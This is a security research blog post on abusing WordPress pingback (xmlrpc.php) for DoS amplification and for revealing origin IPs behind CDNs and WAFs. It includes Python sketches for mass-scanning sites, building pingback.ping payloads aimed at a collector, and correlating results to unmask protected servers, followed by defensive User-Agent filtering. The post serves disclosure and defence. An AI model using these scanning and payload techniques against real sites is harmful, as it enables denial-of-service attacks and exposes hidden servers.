DoS amplification and CDN/load balancer/WAF bypass. This article shows how easily you can collect WordPress pingback services through Google searches, crawling the Alexa top 1 million websites, Shodan searches, and parsing the CommonCrawl archive. I'll also show how WordPress pingback can be used to reveal a webserver's origin IP address.

TL;DR – start –

35% of the internet is powered by WordPress, so I tried to collect as many pingback services as I could by:

  • Manually Googling for sites containing "xmlrpc": very few pingbacks
  • Searching on Shodan for pingback response headers: hundreds of pingbacks
  • Crawling the Alexa top 1m: more than 5K pingbacks found
  • Parsing the latest CommonCrawl archive (first 500K WordPress sites): 7500 pingbacks found

TL;DR – end –

Although the involvement of WordPress pingback in DoS attacks was discovered back in 2012, it is still a real threat for anyone trying to prevent or mitigate layer 7 DoS attacks.

Quoting Wikipedia:

A pingback is one of three types of linkbacks, methods for Web authors to request notification when somebody links to one of their documents. This enables authors to keep track of who is linking to, or referring to their articles. Some weblog software, such as Movable Type, Serendipity, WordPress, and Telligent Community, support automatic pingbacks where all the links in a published article can be pinged when the article is published.

As described by WordPress, the best way to think about pingbacks is as remote comments:

  • Person A posts something on his blog.
  • Person B posts on her own blog, linking to Person A’s post. This automatically sends a pingback to Person A when both have pingback enabled blogs.
  • Person A’s blog receives the pingback, then automatically goes to Person B’s post to confirm that the pingback did, in fact, originate there.

And as Acunetix wrote on their blog, WordPress has an XMLRPC API that can be accessed through the xmlrpc.php file. One of the methods exposed through this API is the pingback.ping method. With this method, other blogs can announce pingbacks. When WordPress is processing pingbacks, it’s trying to resolve the source URL, and if successful, will make a request to that URL and inspect the response for a link to a certain WordPress blog post. If it finds such a link, it will post a comment on this blog post announcing that somebody mentioned this blog post in their blog.

The problem here is that many DoS stresser/booter services use the WordPress pingback functionality to hide their IP while exhausting the victim server's resources. Below is a screenshot of a stresser/booter service that anyone can rent for a DoS attack, starting from $30/month:

DoS Amplification

When the attacker sends a pingback request to a WordPress site, he/she receives only a few KB of response from it. If the target URL on the victim's website serves large content (such as a PDF or a video), or is a page that triggers a slow query on the victim's application database, this results in an amplification attack. In other words, in response to a relatively small request from the attacker, the WordPress website connects to the victim and causes a large amount of traffic:
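The arithmetic behind the word "amplification" can be sketched as follows. The byte counts are hypothetical illustrations, not measurements from this research, and `amplification_factor` is a name made up for this example.

```python
def amplification_factor(request_bytes: int, victim_response_bytes: int) -> float:
    """Ratio between the bytes the victim has to serve and the bytes the attacker sends."""
    if request_bytes <= 0:
        raise ValueError("request_bytes must be positive")
    return victim_response_bytes / request_bytes


# Hypothetical numbers: a 1 KiB pingback request that points at a 10 MiB PDF.
factor = amplification_factor(1024, 10 * 1024 * 1024)
print(f"amplification: {factor:.0f}x")
```

The ratio only covers bandwidth. A target URL that triggers an expensive database query costs the victim CPU time as well, which this simple ratio does not capture.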

Discover real IP address

As I wrote above, when WordPress processes a pingback it tries to resolve the source URL and, if successful, makes a request to that URL and inspects the response for a link to a certain WordPress blog post. When this happens, the "victim's webserver" receives an HTTP request from the WordPress website. By exploiting this functionality, an attacker can request a pingback to a webserver they control and discover the real IP address of the WordPress website, even if it's behind a WAF-as-a-service or a CDN.

You can find more information about this technique here:

Crawling, crawling, crawling... rawhide!

My first attempt to crawl the Alexa top 1m list was a failure! Many websites banned my VPS IP address due to "aggressive" crawling and, moreover, many websites apply geographic bans and I have only a single IP address, geolocated in Europe.

Inspired by the beautiful work done by Scott Helme on his crawler.ninja, I decided to crawl the Alexa top 1 million websites looking for /xmlrpc.php, to see how many websites on the top 1m list have the WordPress pingback functionality.

First of all, I wrote a crawler in Python, using the multi-threading functionality provided by the "concurrent" module. Unfortunately, my crawler isn't perfect yet and, due to timeouts, second-level domains that don't resolve to any IP, bans on the IP/subnet of my VPS hosting, etc., I wasn't able to collect data from all one million websites but "only" from 446,370 of them.
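The original crawler is not shown here, so the following is only a minimal sketch of the approach, using `concurrent.futures.ThreadPoolExecutor` from the standard library. The names `xmlrpc_status` and `crawl`, the worker count, and the timeout are assumptions made for illustration.

```python
import http.client
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Iterable, Optional


def xmlrpc_status(domain: str, timeout: float = 5.0) -> Optional[int]:
    """Return the HTTP status of GET /xmlrpc.php, or None if the site is unreachable."""
    url = f"http://{domain}/xmlrpc.php"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # 4xx/5xx answers are still useful (e.g. 405)
    except (urllib.error.URLError, http.client.HTTPException, OSError, ValueError):
        return None  # DNS failure, timeout, refused connection, bad URL, ...


def crawl(domains: Iterable[str],
          check: Callable[[str], Optional[int]] = xmlrpc_status,
          workers: int = 32) -> Dict[str, Optional[int]]:
    """Run `check` over every domain in a thread pool and map domain -> result."""
    domains = list(domains)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # pool.map preserves input order, so zip pairs each domain with its result.
        return dict(zip(domains, pool.map(check, domains)))
```

Passing the check function as a parameter keeps the thread-pool logic separate from the network code, so each part can be tested or replaced on its own.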

Even though I wasn't able to crawl all the websites, I decided that "almost half" was good enough for a first attempt. So, for each website, I collected the following information into Elasticsearch:

Field     Description
scheme    http or https to contact the {url}
url       the "final" URL after all redirections (such as 301 and 302 response statuses)
netloc    the netloc value of urlparse(url)
status    the response status code
headers   all response headers
banner    the server banner (such as Apache, Nginx, etc.)
waf       a guess at the presence of a WAF, made by analyzing the server banner or the response Set-Cookie header
xmlrpc    the response status code of a request to {scheme}://{url}/xmlrpc.php
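As an illustration, the fields above could be modelled with a small dataclass. The class name `CrawlRecord`, the field types, and the idea of deriving `netloc` and `banner` from the other fields are assumptions. The original Elasticsearch mapping is not shown in the article.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import urlparse


@dataclass
class CrawlRecord:
    scheme: str                     # "http" or "https"
    url: str                        # final URL after redirects
    status: int                     # response status code
    headers: Dict[str, str] = field(default_factory=dict)
    waf: Optional[str] = None       # guessed WAF/CDN name, if any
    xmlrpc: Optional[int] = None    # status code of the /xmlrpc.php request

    @property
    def netloc(self) -> str:
        """The netloc value of urlparse(url)."""
        return urlparse(self.url).netloc

    @property
    def banner(self) -> Optional[str]:
        """The server banner, read from the Server response header."""
        return self.headers.get("Server")


record = CrawlRecord("https", "https://www.example.com/blog/", 200,
                     {"Server": "nginx"}, xmlrpc=405)
print(record.netloc, record.banner, record.xmlrpc)
```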

Now, to get all the websites with a reachable /xmlrpc.php on which I want to test the pingback functionality, I ran this query: "give me all websites with /xmlrpc.php and with response code = 405":
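The query itself is not reproduced here. One way to express it with the Elasticsearch query DSL is sketched below, assuming the `xmlrpc` field from the table above is indexed as a number. The function name and the `size` and `_source` values are assumptions.

```python
import json


def xmlrpc_405_query(size: int = 1000) -> dict:
    """Build a search body matching documents whose xmlrpc status code is 405."""
    return {
        "size": size,
        "_source": ["scheme", "url", "netloc"],  # only the fields needed later
        "query": {"term": {"xmlrpc": 405}},
    }


print(json.dumps(xmlrpc_405_query(), indent=2))
```

A 405 (Method Not Allowed) response to a plain GET suggests that the endpoint exists but accepts POST requests only.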

Once I had the list, I wanted to test pingback on all 103,612 websites. To do that, I needed to make every WordPress site send a pingback to an external website that receives it and saves the target URL and the source IP address that contacted it. This was easy, since WordPress puts its URL inside the User-Agent request header together with the WordPress version. So, I created a PHP script that writes the URL, IP, and version of each HTTP request received to a JSON file.

To send a pingback request, I just need to send the following request to each of the 103,612 WordPress sites, specifying two parameters: the pingback target URL and a local URL:
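The original request is not reproduced here. As a sketch, the body of a `pingback.ping` call can be built with Python's standard `xmlrpc.client` module. In the Pingback specification the two parameters are the source URI (the page that WordPress will fetch, here the collector) and the target URI (a post on the WordPress site itself). The function name and the example URLs are hypothetical.

```python
import xmlrpc.client


def build_pingback_payload(source_url: str, target_url: str) -> bytes:
    """Serialize a pingback.ping(sourceURI, targetURI) XML-RPC call."""
    body = xmlrpc.client.dumps((source_url, target_url),
                               methodname="pingback.ping")
    return body.encode("utf-8")


payload = build_pingback_payload(
    "https://collector.example/pingback",   # hypothetical: page WordPress will request
    "https://blog.example/?p=1",            # hypothetical: a post on the WordPress site
)
print(payload.decode("utf-8"))
```

The payload would then be sent as an HTTP POST to the site's /xmlrpc.php endpoint with a `Content-Type: text/xml` header.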

After a successful pingback, my webserver should receive an HTTP request, and I should get a response like this:

Below is a request logged by my webserver. As you can see, the User-Agent contains the URL, origin IP, and WordPress version:
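The logging script described above was written in PHP and is not shown. The following Python sketch illustrates the same idea under two assumptions: that the User-Agent starts with `WordPress/<version>; <site URL>`, and that the IP is taken from the address of the connecting peer. The names `PingbackHit` and `parse_pingback_request` are made up for this example.

```python
import re
from typing import NamedTuple, Optional

# Assumed format: "WordPress/<version>; <site URL>[; anything else]"
UA_PATTERN = re.compile(
    r"^WordPress/(?P<version>[^;\s]+);\s*(?P<url>https?://[^;\s]+)"
)


class PingbackHit(NamedTuple):
    version: str
    site_url: str
    source_ip: str


def parse_pingback_request(user_agent: str, remote_addr: str) -> Optional[PingbackHit]:
    """Extract WordPress version and site URL from the User-Agent; keep the peer IP."""
    match = UA_PATTERN.match(user_agent)
    if match is None:
        return None  # not a WordPress pingback request
    return PingbackHit(match["version"], match["url"], remote_addr)


hit = parse_pingback_request(
    "WordPress/5.3.2; https://blog.example; verifying pingback from 203.0.113.7",
    "198.51.100.10",
)
print(hit)
```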

When the script finished, it had collected 5142 pingbacks from WordPress sites all over the world! Here are some stats:

  • 5142 different websites from which I received a pingback
  • 108 different WordPress versions
  • 4582 unique origin IPs

Now that I have my botnet (joking 😂), I would like to see how many of those websites are behind a CDN/WAF such as CloudFlare, trying to hide their IP address. So, I correlated the URL received in the User-Agent of each pingback request with the entry I have in my Elasticsearch, trying to guess whether the target website is behind a WAF or CDN. I found 543 websites that expose their real IP address.
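A minimal sketch of that correlation, assuming the pingback results are available as (site URL, source IP) pairs and the crawl data as a mapping from netloc to the guessed WAF/CDN name. Both data shapes and the function name `exposed_origins` are assumptions made for illustration.

```python
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import urlparse


def exposed_origins(
    pingbacks: Iterable[Tuple[str, str]],
    waf_by_netloc: Dict[str, Optional[str]],
) -> List[Tuple[str, str, str]]:
    """Return (netloc, waf, source_ip) for sites flagged as behind a WAF/CDN."""
    exposed = []
    for site_url, source_ip in pingbacks:
        netloc = urlparse(site_url).netloc
        waf = waf_by_netloc.get(netloc)
        if waf:  # the crawl guessed a WAF/CDN, yet the pingback came from source_ip
            exposed.append((netloc, waf, source_ip))
    return exposed


# Hypothetical sample data.
hits = [("https://blog.example", "198.51.100.10"),
        ("http://plain.example", "198.51.100.20")]
crawl_data = {"blog.example": "cloudflare", "plain.example": None}
print(exposed_origins(hits, crawl_data))
```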

I want more.

35% of the internet is powered by WordPress and, considering that the total number of active websites is estimated at over 1.3 billion according to a survey published by Netcraft, this means that about 455 million websites are using WordPress. I think I can find more than 5K pingback services if I find a better way to crawl the internet but... how?

I discovered a beautiful project named Common Crawl that is an "open repository of web crawl data that can be accessed and analyzed by anyone". The data I used was crawled between November 23 and December 6 and contains 2.64 billion web pages or 270 TiB of uncompressed content.

This way, I don't need to crawl websites myself: I can just access the data produced by the CommonCrawl crawler and try to identify WordPress websites in it. I collected the first 500K WordPress websites and tested each of them for a pingback service.
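The article does not say how WordPress websites were recognized in the CommonCrawl data. One plausible way, sketched here as an assumption, is the autodiscovery mechanism from the Pingback specification: an `X-Pingback` response header or a `<link rel="pingback">` element in the page. The function name `discover_pingback` is hypothetical.

```python
import re
from html import unescape
from typing import Mapping, Optional

# Pattern given by the Pingback specification for the <link> element.
LINK_RE = re.compile(r'<link rel="pingback" href="([^"]+)" ?/?>')


def discover_pingback(headers: Mapping[str, str], body: str) -> Optional[str]:
    """Return the advertised pingback endpoint of a crawled page, if any."""
    # The header takes precedence over the <link> element.
    for name, value in headers.items():
        if name.lower() == "x-pingback":
            return value.strip()
    match = LINK_RE.search(body)
    if match:
        return unescape(match.group(1))  # decode &amp; and similar entities
    return None


page = '<html><head><link rel="pingback" href="https://blog.example/xmlrpc.php" /></head></html>'
print(discover_pingback({}, page))
```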

Doing so, I found 7500 active pingback services, each of which sent a pingback request to my website.

I tried to inform but...

It seems that many companies, government websites, and military websites are not interested in this problem, and many of them didn't reply to the emails in which I tried to inform them about it. I found a lot of "big" websites that expose their origin IP address and that can be involved in DoS amplification attacks. Some statistics:

Top TLD

https://www.rev3rse.it/wp_tld.csv

Top WordPress Version

Since WordPress pingback puts its version in the User-Agent request header, these are the most used versions of WordPress with an active and working pingback service: https://www.rev3rse.it/wp_versions.csv

Netname

https://www.rev3rse.it/wp_netnames.csv

How to prevent?

If you're not running a WordPress website, or you're not interested in receiving pingbacks from other WordPress sites (and, moreover, you want to prevent DoS amplification attacks), you have a lot of ways to block requests coming from WordPress pingback by filtering on the User-Agent request header.
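For an application served through WSGI, the same filtering idea can be sketched as a small middleware. The pattern assumes that pingback verification requests carry a User-Agent starting with `WordPress/` and containing `verifying pingback`. The class name `BlockPingback` and the 403 response are choices made for this example.

```python
import re

# Assumed shape of the pingback verification User-Agent.
PINGBACK_UA = re.compile(r"^WordPress/.*verifying pingback", re.IGNORECASE)


def is_pingback_user_agent(user_agent: str) -> bool:
    """True when the User-Agent looks like a WordPress pingback verification."""
    return bool(PINGBACK_UA.search(user_agent or ""))


class BlockPingback:
    """WSGI middleware that answers 403 to WordPress pingback requests."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if is_pingback_user_agent(environ.get("HTTP_USER_AGENT", "")):
            body = b"Forbidden\n"
            start_response("403 Forbidden", [
                ("Content-Type", "text/plain"),
                ("Content-Length", str(len(body))),
            ])
            return [body]
        return self.app(environ, start_response)  # everything else passes through
```

Wrapping an existing application is a single line, for example `application = BlockPingback(application)`. Rejecting the request before it reaches the application avoids serving large files or running slow queries for it.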

If your website or web application is behind an AWS load balancer, you can easily block it by creating a new rule:

Or if you want to do something similar on Nginx:

Or via ModSecurity SecRule

I'll update this article once I finish parsing the whole CommonCrawl database.
Follow me on twitter to get updates!



The beautiful image used in this article was created by Zaki Abdelmounim.